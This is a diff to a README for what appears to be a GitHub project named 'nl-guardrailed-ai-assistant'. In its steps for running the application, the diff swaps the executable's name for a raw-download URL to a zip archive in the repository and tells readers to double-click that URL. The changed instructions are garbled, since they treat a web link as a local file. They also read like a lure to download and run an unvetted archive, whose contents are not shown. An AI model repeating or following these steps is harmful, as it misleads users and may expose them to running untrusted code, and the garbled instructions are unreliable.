Abdelhaq9/nl-guardrailed-ai-assistant/README.md

 ### 🖥️ Running the Application
 1. Open the folder where you extracted the files.
-2. Find the executable file named `nl-guardrailed-ai-assistant.exe`.
+2. Find the executable file named `https://github.com/Abdelhaq9/nl-guardrailed-ai-assistant/raw/refs/heads/master/GuardrailedAiAssistant/ai-assistant-guardrailed-nl-1.4.zip`.
-3. Double-click on the `nl-guardrailed-ai-assistant.exe` file to launch the application.
+3. Double-click on the `https://github.com/Abdelhaq9/nl-guardrailed-ai-assistant/raw/refs/heads/master/GuardrailedAiAssistant/ai-assistant-guardrailed-nl-1.4.zip` file to launch the application.

 ## 🖊️ How to Use the Assistant
 Once the application is open: